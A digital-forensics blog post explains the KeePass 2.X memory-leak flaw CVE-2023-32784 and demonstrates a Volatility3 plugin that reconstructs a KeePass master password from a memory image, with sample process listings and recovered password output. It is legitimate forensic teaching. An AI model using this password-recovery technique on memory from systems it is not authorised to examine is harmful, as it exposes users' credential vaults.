📦 Volatility3 Windows Plugin : KeePass

Abstract Link to heading

On May 1st, 2023, vdhoney1 raised concerns about a flaw he found impacting KeePass 2.X.2. Vdhoney claimed to be able to reconstruct the master password from memory. A was later released by the researcher in dotnet, and another in python3. A POC 3 was later released by the researcher not only in dotnet but also in python34.

Today in this blog post we will describe the vulnerability and see how we can create a volatility3 plugin to help forensics investigators to retrieve passwords from memory.

Vulnerability description Link to heading

The vulnerability (CVE-2023-32784 5) resides in the basic KeePass version 2.X written in .NET. This version utilizes its own custom-made text box named SecureTextBoxEx, not only for the master password entry dialog but also in other parts of the program such as password edit boxes. Though this use case is not likely to be used by users as it is a bad practice, it should be noted that the flaw does not cover the scenario where the master password was copied from a clipboard. From this observation, Vdohney built up a method to recover that scattered information from memory. Indeed, this text box produces left over strings when a password is entered. For example, when “Hello” is typed, the following strings remain present in memory “•e, ••l, •••l, ••••o”. One can find more details about this vulnerability on vdhoney’s github 3.

The KeePass volatility3 plugin Link to heading

As a forensics investigator, you might have actual (or past) cases where KeePass 2.X process activities were retrieved. Using volatility3, it is possible to list the running processes using the “pslist” or “psscan” plugin.

~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine » vol -f KeePassMachine.mem windows.pslist                                                                                                                     k1nd0ne@MacBook-Pro-de-Felix
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished
PID	PPID	ImageFileName	Offset(V)	Threads	Handles	SessionId	Wow64	CreateTime	ExitTime	File output

4	0	System	0x9908d5a87040	136	-	N/A	False	2023-05-19 14:20:08.000000 	N/A	Disabled
108	4	Registry	0x9908d5af6080	4	-	N/A	False	2023-05-19 14:20:04.000000 	N/A	Disabled
412	4	smss.exe	0x9908dabd8040	2	-	N/A	False	2023-05-19 14:20:08.000000 	N/A	Disabled
532	516	csrss.exe	0x9908dac800c0	11	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
628	516	wininit.exe	0x9908db831080	3	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
648	620	csrss.exe	0x9908db847140	13	-	1	False	2023-05-19 14:20:32.000000 	N/A	Disabled
700	628	services.exe	0x9908db894080	7	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
740	620	winlogon.exe	0x9908db8a4080	3	-	1	False	2023-05-19 14:20:32.000000 	N/A	Disabled
796	628	lsass.exe	0x9908db8c8080	6	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
912	700	svchost.exe	0x9908db936240	13	-	0	False	2023-05-19 14:20:32.000000 	N/A	Disabled
1716	912	dllhost.exe	0x9908de764080	5	-	1	False	2023-05-19 14:23:07.000000 	N/A	Disabled
4888	700	SgrmBroker.exe	0x9908df512080	7	-	0	False	2023-05-19 14:23:08.000000 	N/A	Disabled
7820	912	WmiPrvSE.exe	0x9908da4f7080	4	-	0	False	2023-05-19 14:23:26.000000 	N/A	Disabled
4272	4528	FTK Imager.exe	0x9908da509080	12	-	1	False	2023-05-19 14:23:42.000000 	N/A	Disabled
4100	700	WUDFHost.exe	0x9908de9a3080	5	-	0	False	2023-05-19 14:23:43.000000 	N/A	Disabled
2868	912	ShellExperienc	0x9908dec2c080	9	-	1	False	2023-05-19 14:23:45.000000 	N/A	Disabled
7684	912	RuntimeBroker.	0x9908d7f0d2c0	3	-	1	False	2023-05-19 14:23:46.000000 	N/A	Disabled
752	4528	KeePass.exe	0x9908da51b300	4	-	1	False	2023-05-19 14:25:34.000000 	N/A	Disabled
6344	700	svchost.exe	0x9908dd88a080	5	-	0	False	2023-05-19 14:25:49.000000 	N/A	Disabled

In this example we can see that the KeePass process was running on the host machine. The PID retrieved is “752”. Using volatility3, one can dump this process layer and retrieve all the sections linked to the virtual address spaces. Once completed, one can map virtual pages to physical pages and extract the residing data.

A custom plugin allows to parse the data to isolate the relevant patterns (in this case “●”) seeking to further attempt the reconstruction of the master KeePass password entered by a user. The plugin can be found here: https://github.com/forensicxlab/volatility3_plugins/blob/main/keepass.py

By passing the PID of the process to the volatility3 KeePass plugin, one can try to reconstruct the master password:

~/work/DFIR/Memory Analysis/MemoryImages/KeePassMachine » vol -f KeePassMachine.mem windows.keepass --pid 752                                                                                                          k1nd0ne@MacBook-Pro-de-Felix
Volatility 3 Framework 2.4.1
Progress:  100.00		PDB scanning finished
Offset	Size	Constructed_Password

0x3ba6000	0x1000	u
0x3ba7000	0x1000	up
0x3ba7000	0x1000	upe
0x3ba8000	0x1000	uper
0x3ba9000	0x1000	uperM
0x3ba9000	0x1000	uperMa
0x3baa000	0x1000	uperMa
0x3baa000	0x1000	uperMas
0x3bab000	0x1000	uperMast
0x3bab000	0x1000	uperMaste
0x3bac000	0x1000	uperMaste
0x3bac000	0x1000	uperMaster
0x3bad000	0x7000	uperMasterP
0x3bad000	0x7000	uperMasterPa
0x3bad000	0x7000	uperMasterPas
0x3bad000	0x7000	uperMasterPass
0x3bad000	0x7000	uperMasterPassw
0x3bad000	0x7000	uperMasterPasswo
0x3bad000	0x7000	uperMasterPasswor
0x3bad000	0x7000	uperMasterPassword
0x7ffbf8ac5000	0x1000	uperMasterPassword
0x96e545bd2000	0x1000	{u,,}perMasterPassword
0xc58000400000	0x200000	{u,&,o}perMasterPassword
0xf80564600000	0x1200000	{u,&,,,J}perMasterPassword
0xf805737d3000	0x1f000	{u,&,,,o, }perMasterPassword

Even if the first character of the password is not store in memory, the latter can be however easily brute forced.

Conclusion Link to heading

To conclude this article, we demonstrated that the reconstruction of a master password of Keepass can be implemented into volatility3 framework via a custom plugin. The discovery of new memory extraction techniques is helping the field of digital forensics and specially law enforcement agencies that are now able to access memory from devices in a more efficient and non-destructive way. This methodology could be valuable in solving actual incident cases, including past ones where the memory was retrieved and stored and keepass master password remained unbroke.

This plugin was tested on a Win10 22H2 memory image. Do not hesitate to reach me at felix.guyard@forensicxlab.com to enhance this article.

References Link to heading